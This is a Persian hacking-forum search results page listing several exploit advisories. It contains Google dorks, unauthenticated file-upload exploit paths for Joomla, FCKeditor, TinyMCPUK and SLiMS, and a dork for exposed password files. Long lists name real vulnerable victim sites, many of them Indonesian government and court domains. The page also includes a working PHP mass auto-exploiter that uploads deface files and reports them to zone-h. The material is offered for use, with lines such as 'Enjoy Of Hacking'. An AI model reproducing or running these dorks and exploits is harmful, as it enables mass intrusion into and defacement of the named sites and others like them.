امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'file'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

103 نتیجه پیدا شد

  1. |[+] Exploit Title: File containing passwords host Bypass Vulnerability |[+] Date:17/10/2018 |[+] Exploit Author : Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage:https://fenek.io |[+] dork: inurl:/host.txt + filetype:txt + "password" |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : Rednofozi Anonysec hackers iran team |[+] Vulnerability Type :host Bypass |[+] Severity Level :Med. |[+] Exploit :info-------------->host Bypass Vulnerability ***************************************************************| [+]Google Search inurl:/host.txt + filetype:txt + "password" [+]The End , Enjoy Of Hacking ...! [+] [+] http://www.zone-h.org/mirror/id/31722197 ***************************************************************| |--------------------------------------------------------------| Host Bypass Vulnerability https://android-bible.com/bible/Infos%20Host.txt https://fenek.io/ui/i18n/en_US/host.txt https://forums.fogproject.org/assets/uploads/files/1478478282469-dotfogsettings-host.txt?v=qt568d7l06g About 110 results results Enjoy Of Hacking ...! **************************************************************** Discovered by : Rednofozi |RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi.Inj3ct0r http://www.exploit4arab.org/exploits/2166
  2. # Exploit Title : Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Vendor Homepage : joomlabiblestudy.org ~ extensions.joomla.org/extension/proclaim/ # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CVE: CVE-2018-7316 # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018090270 # Cyberizm : cyberizm.org/cyberizm-joomla-com-biblestudy-proclaim-mediafileform-exploit.html ################################################################################################# # Google Dork : inurl:''/index.php?option=com_biblestudy'' # Exploit : TARGET/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 # Note : Go to the '' Media Files '' Category. Choose your File and Upload it. # Directory File Path : TARGET/images/biblestudy/media/.... ################################################################################################# # Example Vulnerable Sites => kalamekhuda.com/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 => [ Proof of Concept for Vulnerability and Proof of Mirror ] => archive.is/nfskL => archive.is/5NaKe hereatcalvary.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 [ Proof of Concept ] => archive.is/oEPx3 cclivinghope.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  3. # Exploit Title : Developed by Rate it Services Business Solutions Mājas lapu izstrāde FCKeditor Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Vendor Homepage : rate.lv # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060245 # Cyberizm : cyberizm.org/cyberizm-developed-by-rateit-services-business-solutions-exploit.html ################################################################################################# # Title : Developed by Rate Business Solutions Mājas lapu izstrāde Latvia FCKeditor Remote File Upload Vulnerability # Google Dorks : intext:''Developed by: RATE Business Soltuions'' intext:''Developed By: Mājas lapu izstrāde'' intext:''Developed by: RATE IT SERVICES'' # Exploit : /jscripts/editor/filemanager/connectors/uploadtest.html # Path : /allfiles/... ################################################################################################# # Example Vulnerable Sites : There are 31 domains hosted on this server. => 178.16.24.19 btp.travel/jscripts/editor/filemanager/connectors/uploadtest.html => [ Proof of Concept ] => archive.is/HWzoL => archive.is/s2AaH behold.lv/jscripts/editor/filemanager/connectors/uploadtest.html hotelsinpl.com/jscripts/editor/filemanager/connectors/uploadtest.html bhyper.com/jscripts/editor/filemanager/connectors/uploadtest.html hotelsinwarsaw.eu/jscripts/editor/filemanager/connectors/uploadtest.html gobaltic.com/jscripts/editor/filemanager/connectors/uploadtest.html eursecure.com/jscripts/editor/filemanager/connectors/uploadtest.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  4. #Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Remote File Upload Exploit #Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team #Vendor Homepage : slims.web.id #Software Download Link : github.com/slims/ * slims.web.id/web/ * slims.web.id/goslims/ #Affected Version : 5/6/7 #Tested on : Windows / Linux #Exploit Risk : High #CXSecurity : cxsecurity.com/ascii/WLB-2018050260 #Cyberizm : cyberizm.org/cyberizm-slims-senayan-library-management-system-indo-exploit.html ############################################################################################################## # Long Exploit Title : Slims CMS Senayan OpenSource Library Management System The Winner in the Category of OSS Indonesia ICT Award 2009 Arbitrary File Upload Vulnerability and Auto Exploiter #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit Description : SLiMS (Senayan Library Management System) is a free and open source Library Management System. It is build on free and open source technology like PHP and MySQL. SLiMS provides many features such as bibliography database, circulation, membership management and many more that will help "automating" library tasks. Features : Online Public Access Catalog (OPAC) with thumbnail document image support (can be use for book cover), Simple Search and Advanced Search mode Digital contents/files (PDF, DOC, RTF, XLS, PPT, Video, Audio, etc.) attachment in each bibliographic record support Documents record detail in MODS (Metadata Object Description Schema) XML format RSS (Really Simple Syndication) XML format for OPAC OAI-PMH (Open Archives Initiative Protocol for Metadata Harvesting) in Dublin Core format for metadata harvesting purpose Bibliographic/catalog database management with book cover image support Serial publication control Document items (book copies) management with barcode support Master Files management to manages document referential data such as GMD, Collection Types, Publishers, Authors, Locations, Authors and Suppliers Circulation support with following sub-features : Loan and Return transaction Collections reservation Quick return Configurable and flexible Loan Rules Membership management Stock Taking module to help Stock Op name process in library Reporting and Statistics System modules with following sub-features : Global system configuration Modules management Application Users and Groups management Holiday settings Barcodes generator utility Database backup utility Responsive user interface 3rd party bibliographic records indexing support with Sphinx Search and MongoDB Demo Version : softaculous.com/softaculous/demos/SLiMS Admin Username: admin Admin Password: pass ############################################################################################################## #Slims CMS Senayan OpenSource Library Management System File Attachment Arbitrary File Upload Vulnerability Original Affected Code Here => # Example Affected Code from slims5_meranti [ Original Vulnerability Code ] => [/code]<?php /** * Copyright (C) 2007,2008 Arie Nugraha (dicarve@yahoo.com) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * */ /* Biblio file Adding Pop Windows */ // key to authenticate define('INDEX_AUTH', '1'); // key to get full database access define('DB_ACCESS', 'fa'); // main system configuration require '../../../sysconfig.inc.php'; // IP based access limitation require LIB_DIR.'ip_based_access.inc.php'; do_checkIP('smc'); do_checkIP('smc-bibliography'); // start the session require SENAYAN_BASE_DIR.'admin/default/session.inc.php'; require SENAYAN_BASE_DIR.'admin/default/session_check.inc.php'; require SIMBIO_BASE_DIR.'simbio_GUI/table/simbio_table.inc.php'; require SIMBIO_BASE_DIR.'simbio_GUI/form_maker/simbio_form_table.inc.php'; require SIMBIO_BASE_DIR.'simbio_DB/simbio_dbop.inc.php'; require SIMBIO_BASE_DIR.'simbio_FILE/simbio_file_upload.inc.php'; require SIMBIO_BASE_DIR.'simbio_FILE/simbio_directory.inc.php'; // privileges checking $can_write = utility::havePrivilege('bibliography', 'w'); if (!$can_write) { die('<div class="errorBox">'.__('You are not authorized to view this section').'</div>'); } // page title $page_title = 'File Attachment Upload'; // check for biblio ID in url $biblioID = 0; if (isset($_GET['biblioID']) AND $_GET['biblioID']) { $biblioID = (integer)$_GET['biblioID']; } // check for file ID in url $fileID = 0; if (isset($_GET['fileID']) AND $_GET['fileID']) { $fileID = (integer)$_GET['fileID']; } // start the output buffer ob_start(); /* main content */ // biblio topic save proccess if (isset($_POST['upload']) AND trim(strip_tags($_POST['fileTitle'])) != '') { $uploaded_file_id = 0; $title = trim(strip_tags($_POST['fileTitle'])); $url = trim(strip_tags($_POST['fileURL'])); // create new sql op object $sql_op = new simbio_dbop($dbs); // FILE UPLOADING if (isset($_FILES['file2attach']) AND $_FILES['file2attach']['size']) { // create upload object $file_dir = trim($_POST['fileDir']); $file_upload = new simbio_file_upload(); $file_upload->setAllowableFormat($sysconf['allowed_file_att']); $file_upload->setMaxSize($sysconf['max_upload']*1024); $file_upload->setUploadDir(REPO_BASE_DIR.DIRECTORY_SEPARATOR.str_replace('/', DIRECTORY_SEPARATOR, $file_dir)); $file_upload_status = $file_upload->doUpload('file2attach'); if ($file_upload_status === UPLOAD_SUCCESS) { $file_ext = substr($file_upload->new_filename, strrpos($file_upload->new_filename, '.')+1); $fdata['uploader_id'] = $_SESSION['uid']; $fdata['file_title'] = $dbs->escape_string($title); $fdata['file_name'] = $dbs->escape_string($file_upload->new_filename); $fdata['file_url'] = $dbs->escape_string($url); $fdata['file_dir'] = $dbs->escape_string($file_dir); $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc']))); $fdata['mime_type'] = $sysconf['mimetype'][$file_ext]; $fdata['input_date'] = date('Y-m-d H:i:s'); $fdata['last_update'] = $fdata['input_date']; // insert file data to database @$sql_op->insert('files', $fdata); $uploaded_file_id = $sql_op->insert_id; utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' upload file ('.$file_upload->new_filename.')'); } else { echo '<script type="text/javascript">'; echo 'alert(\''.__('Upload FAILED! Forbidden file type or file size too big!').'\');'; echo 'self.close();'; echo '</script>'; die(); } } else { if ($url && preg_match('@^(http|https|ftp|gopher):\/\/@i', $url)) { $fdata['uploader_id'] = $_SESSION['uid']; $fdata['file_title'] = $dbs->escape_string($title); $fdata['file_name'] = $dbs->escape_string($url); $fdata['file_url'] = $dbs->escape_string($fdata['file_name']); $fdata['file_dir'] = 'literal{NULL}'; $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc']))); $fdata['mime_type'] = 'text/uri-list'; $fdata['input_date'] = date('Y-m-d H:i:s'); $fdata['last_update'] = $fdata['input_date']; // insert file data to database @$sql_op->insert('files', $fdata); $uploaded_file_id = $sql_op->insert_id; } } // BIBLIO FILE RELATION DATA UPDATE // check if biblio_id POST var exists if (isset($_POST['updateBiblioID']) AND !empty($_POST['updateBiblioID'])) { $updateBiblioID = (integer)$_POST['updateBiblioID']; $data['biblio_id'] = $updateBiblioID; $data['file_id'] = $uploaded_file_id; $data['access_type'] = trim($_POST['accessType']); $data['access_limit'] = 'literal{NULL}'; // parsing member type data if ($data['access_type'] == 'public') { $groups = ''; if (isset($_POST['accLimit']) AND count($_POST['accLimit']) > 0) { $groups = serialize($_POST['accLimit']); } else { $groups = 'literal{NULL}'; } $data['access_limit'] = trim($groups); } if (isset($_POST['updateFileID'])) { $fileID = (integer)$_POST['updateFileID']; // file biblio access update $update1 = $sql_op->update('biblio_attachment', array('access_type' => $data['access_type'], 'access_limit' => $data['access_limit']), 'biblio_id='.$updateBiblioID.' AND file_id='.$fileID); // file description update $update2 = $sql_op->update('files', array('file_title' => $title, 'file_url' => $url, 'file_desc' => $dbs->escape_string(trim($_POST['fileDesc']))), 'file_id='.$fileID); if ($update1) { echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment data updated!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$updateBiblioID.'\');'; echo '</script>'; } else { utility::jsAlert(''.__('File Attachment data FAILED to update!').''."\n".$sql_op->error); } } else { if ($sql_op->insert('biblio_attachment', $data)) { echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$data['biblio_id'].'\');'; echo '</script>'; } else { utility::jsAlert(''.__('File Attachment data FAILED to save!').''."\n".$sql_op->error); } } utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' updating file attachment data'); } else { if ($uploaded_file_id) { // add to session array $fdata['file_id'] = $uploaded_file_id; $fdata['access_type'] = trim($_POST['accessType']); $_SESSION['biblioAttach'][$uploaded_file_id] = $fdata; echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php\');'; echo '</script>'; } } } // create new instance $form = new simbio_form_table('mainForm', $_SERVER['PHP_SELF'].'?biblioID='.$biblioID, 'post'); $form->submit_button_attr = 'name="upload" value="'.__('Upload Now').'" class="button"'; // form table attributes $form->table_attr = 'align="center" id="dataList" cellpadding="5" cellspacing="0"'; $form->table_header_attr = 'class="alterCell" style="font-weight: bold;"'; $form->table_content_attr = 'class="alterCell2"'; // query $file_attach_q = $dbs->query("SELECT fl.*, batt.* FROM files AS fl LEFT JOIN biblio_attachment AS batt ON fl.file_id=batt.file_id WHERE batt.biblio_id=$biblioID AND batt.file_id=$fileID"); $file_attach_d = $file_attach_q->fetch_assoc(); // edit mode if ($file_attach_d['biblio_id'] AND $file_attach_d['file_id']) { $form->addHidden('updateBiblioID', $file_attach_d['biblio_id']); $form->addHidden('updateFileID', $file_attach_d['file_id']); } else if ($biblioID) { $form->addHidden('updateBiblioID', $biblioID); } // file title $form->addTextField('text', 'fileTitle', __('Title').'*', $file_attach_d['file_title'], 'style="width: 95%; overflow: auto;"'); // file attachment if ($file_attach_d['file_name']) { $form->addAnything('Attachment', $file_attach_d['file_dir'].'/'.$file_attach_d['file_name']); } else { // file upload dir // create simbio directory object $repo = new simbio_directory(REPO_BASE_DIR); $repo_dir_tree = $repo->getDirectoryTree(5); $repodir_options[] = array('', __('Repository ROOT')); if (is_array($repo_dir_tree)) { // sort array by index ksort($repo_dir_tree); // loop array foreach ($repo_dir_tree as $dir) { $repodir_options[] = array($dir, $dir); } } // add repo directory options to select list $form->addSelectList('fileDir', __('Repo. Directory'), $repodir_options); // file upload $str_input = simbio_form_element::textField('file', 'file2attach'); $str_input .= ' Maximum '.$sysconf['max_upload'].' KB'; $form->addAnything(__('File To Attach'), $str_input); } // file url $form->addTextField('textarea', 'fileURL', __('URL'), $file_attach_d['file_url'], 'rows="1" style="width: 100%; overflow: auto;"'); // file description $form->addTextField('textarea', 'fileDesc', __('Description'), $file_attach_d['file_desc'], 'rows="2" style="width: 100%; overflow: auto;"'); // file access $acctype_options[] = array('public', __('Public')); $acctype_options[] = array('private', __('Private')); $form->addSelectList('accessType', __('Access'), $acctype_options, $file_attach_d['access_type']); // file access limit if set to public $group_query = $dbs->query('SELECT member_type_id, member_type_name FROM mst_member_type'); $group_options = array(); while ($group_data = $group_query->fetch_row()) { $group_options[] = array($group_data[0], $group_data[1]); } $form->addCheckBox('accLimit', __('Access Limit by Member Type'), $group_options, !empty($file_attach_d['access_limit'])?unserialize($file_attach_d['access_limit']):null ); // print out the object echo $form->printOut(); /* main content end */ $content = ob_get_clean(); // include the page template require SENAYAN_BASE_DIR.'/admin/'.$sysconf['admin_template']['dir'].'/notemplate_page_tpl.php';[/code] ############################################################################################################## #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit #Google Dork 1 : intext:''The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id #Google Dork 3 : inurl:''/slims5-meranti/'' site:id #Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 5 : Powered by SLiMS site:id #Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii #Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan. #Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog. #Google Dork 9 : SLiMS (Senayan Library Management System) is an open source Library Management System. It is build on Open source technology like PHP and MySQL. #Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly This software and this template are released Under GNU GPL License Version 3 #Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id #Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog #Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library. #Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue) #Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id #Google Dork 16 : Senayan | Open Source Library Management System :: OPAC Note : Use your brain to find more dorks. Note : Please upgrade and update your site on the latest versions of SLİMS Senayan Library Management System and do not let special characters or add admin in the next version. #Exploit Code : ..../admin/modules/bibliography/pop_attach.php #Path : /repository/.... # Note : Fill the form and choose your file and upload it. # Allowed File Extensions : txt jpg gif png #Indonesian Government / Education Sites are vulnerable for this issue. #Attackers can exploit this issue via a browser or with Auto PHP Exploiter tool. ############################################################################################################## #Auto Exploiter PHP Code => [code]<?php /* # KingSkrupellos from Cyberizm Digital Security Team # Our Security Forum : cyberizm.org # Twitter : twitter.com/kngskrplls # your list.txt must a single directory with this exploiter # ############################################### # This Exploit and Vulnerability was discovered by KingSkrupellos # Thanks for All Moslem Hackers and Cyberizm Digital Security Team # This Exploiter may sometimes couldn't work %100 because sometimes the bot don't understand the command. # If the command don't understand the command, please exploit it manually. # Special thanks : All Moslem Hackers and Cyberizm Digital Security Team ################################################# # note : Please do not remove Cyberizm copyright. # This Exploit Coded By KingSkrupellos from Cyberizm Digital Security Team */ echo " File Attachment Auto Exploiter - coded by KingSkrupellos $ Thanks for All Moslem Hackers and Cyberizm Digital Security Team "; echo "Input your target list: "; $list = trim(fgets(STDIN)); $shell = "yourdefacefilename.txt"; $nickzoneh = "KingSkrupellos"; $exploit = "/admin/modules/bibliography/pop_attach.php"; $path = "/repository/"; $open = fopen("$list","r"); $size = filesize("$list"); $read = fread($open,$size); $lists = explode("\r\n",$read); echo "\n"; foreach($lists as $target){ if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){ $targets = "http://$target"; }else{ $targets = $target; } echo "Target => $targets\n"; echo " [*] Checking Path : "; $cd = curl_init("$targets$exploit"); curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1); curl_exec($cd); $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE); curl_close($cd); if($httpcode == 200){ echo "200 OK\n"; echo " [*] Uploading shell : "; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$targets/$exploit"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, array("fileTitle"=>"CyBeRiZM" , "file2attach"=>"@$shell" , "upload"=>"Unggah Sekarang")); curl_exec($ch); $cek = curl_init(); curl_setopt($cek, CURLOPT_URL, "$targets$path$shell"); curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1); $ceek = curl_exec($cek); $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE); if(preg_match("/hacked/",$ceek) or $ceeks == 200){ echo "OK $targets$path$shell\n"; echo " [*] Zone-H : "; $zh = curl_init("http://zone-h.org/notify/single"); curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1); curl_setopt($zh, CURLOPT_POST, 1); curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5")); $postzh = curl_exec($zh); if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){ echo "OK\n\n"; }else{ echo "NO\n\n"; } }else{ echo "Failed\n\n"; } }else{ echo "Not Vulnerable\n\n"; } }[/code] Important Note : Only .txt .jpg .gif .png files are allowed. # Uploaded File Directory Path : TARGET/PATH/repository/.... TARGET/repository/.... ############################################################################################################## # Example Sites : # perpustakaan.pn-bangli.go.id/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/dAL3j => archive.is/Ott9S # pta-banjarmasin.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/lPDdv => archive.is/BNiKP # pn-singaraja.go.id/opac/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/veBCj - archive.is/GEOy6 pn-singaraja.go.id/opac/admin/modules/bibliography/pop_attach.php pa-kualatungkal.go.id/pustaka/admin/modules/bibliography/pop_attach.php pta-banjarmasin.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php pn-bangil.go.id/perpustakaan/data/admin/modules/bibliography/pop_attach.php pn-tabanan.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php perpustakaan.pn-balige.go.id/admin/modules/bibliography/pop_attach.php docrepository.undana.ac.id/admin/modules/bibliography/pop_attach.php digilib.stimata.ac.id/admin/modules/bibliography/pop_attach.php pustaka.pusair-pu.go.id/akasia/admin/modules/bibliography/pop_attach.php perpustakaan.pn-donggala.go.id/admin/modules/bibliography/pop_attach.php perpustakaan.stikes-paguwarmas.ac.id/admin/modules/bibliography/pop_attach.php opac.staiattanwir.ac.id/repository/admin/modules/bibliography/pop_attach.php opac.lib.idu.ac.id/library_unhan/admin/modules/bibliography/pop_attach.php www.perpustakaanbalitsereal.com/admin/modules/bibliography/pop_attach.php epository.hafshawaty.ac.id/admin/modules/bibliography/pop_attach.php perpusffup.univpancasila.ac.id/admin/modules/bibliography/pop_attach.php perpus.stikesmedikacikarang.ac.id/slim/admin/modules/bibliography/pop_attach.php rbaca.bukitasamfoundation.com/perpustakaan/admin/modules/bibliography/pop_attach.php e-library.darunnajah.ac.id/admin/modules/bibliography/pop_attach.php ############################################################################################################## # Discovered By Hacker KingSkrupellos from Cyberizm Digital Security Technological Turkish Moslem Army ##############################################################################################################
  5. # Indonesia Official CarDealer MediaTech TinyMcPuk Filemanager Arbitrary File Upload Vulnerability # Author : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army # Vendor Homepage => mediatechindonesia.com # Google Dork => All rights reserved. © 2015 Media Tech Indonesia # CWE-264 - [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018050180 # Cyberizm : cyberizm.org/cyberizm-indo-cardealer-mediatech-tinymcpuk-filemanager-exploit.html ################################################################################# Exploit => ...../tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash You can check if the vulnerability still exists via => ...../tinymcpuk/plugins/flash/flash.htm Please upload your file as => /yourfilename.htm.fla Your File Here [ Path ] => /tinymcpuk/gambar/Flash/......htm.fla ################################################################################# Example Sites and Target IP => 103.27.206.203 daihatsusidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash toyotaterpercaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promosidoarjodaihatsu.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promomobiltoyotasurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promomobiltoyotasidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash promomobiltoyotajatim.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash salestoyotagresik.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash saleshondasurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash swalayanrak.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukiwarusurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukiumcsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukisbtsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukisbtmalang.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukimurahsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukimobilsurabaya.net/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukimobilsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash surabayadaihatsu.info/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash surabayadaihatsu.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash umcsuzukipasuruan.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash umcsuzukijatim.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash Example Mirror [ Proof of Concept ] => zone-h.org/mirror/id/31184406 ################################################################################# Discovered By : KingSkrupellos from Cyberizm.Org #################################################################################
  6. # Exploit Title : Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army # Vendor Homepage : joomlacontenteditor.net # Software Download Link : joomlacontenteditor.net/downloads / extensions.joomla.org/extension/jce/ # Exploit Risk : High # CWE-264 - [ Permissions, Privileges, and Access Controls ] # CXSecurity [ Author : KingSkrupellos ] : cxsecurity.com/ascii/WLB-2018050200 # Cyberizm : cyberizm.org/cyberizm-joomla-content-editor-jce-auto-mass-exploiter.html ################################################################################# Exploit Title : Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter Google Dork [ Example ] => inurl:''/index.php?option=com_jce'' You can search all plugins and themes to find more sites. Most of them have this plugin JCE installed. [ % 40 or more ] Use your brain. Explanation for Joomla Content Editor JCE => [ ScreenShot ] https://cdn.pbrd.co/images/Hmx6KZC.jpg JCE makes creating and editing Joomla!® content easy... Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS... Office-like functions and familiar buttons make formatting simple Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface Create Links to Categories, Articles, Weblinks and Contacts¹ in your site using a unique and practical Link Browser Easily tab between WYSIWYG, Code and Preview modes. Create Tables, edit Styles, format text and more... Integrated Spellchecking using your browser's Spellchecker Fine-grained control over the editor layout and features with Editor Profiles Media Manager => Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®, Windows Media Player® and HTML 5 Video and Audio. Easily insert Youtube and Vimeo videos - just paste in the URL and Insert! 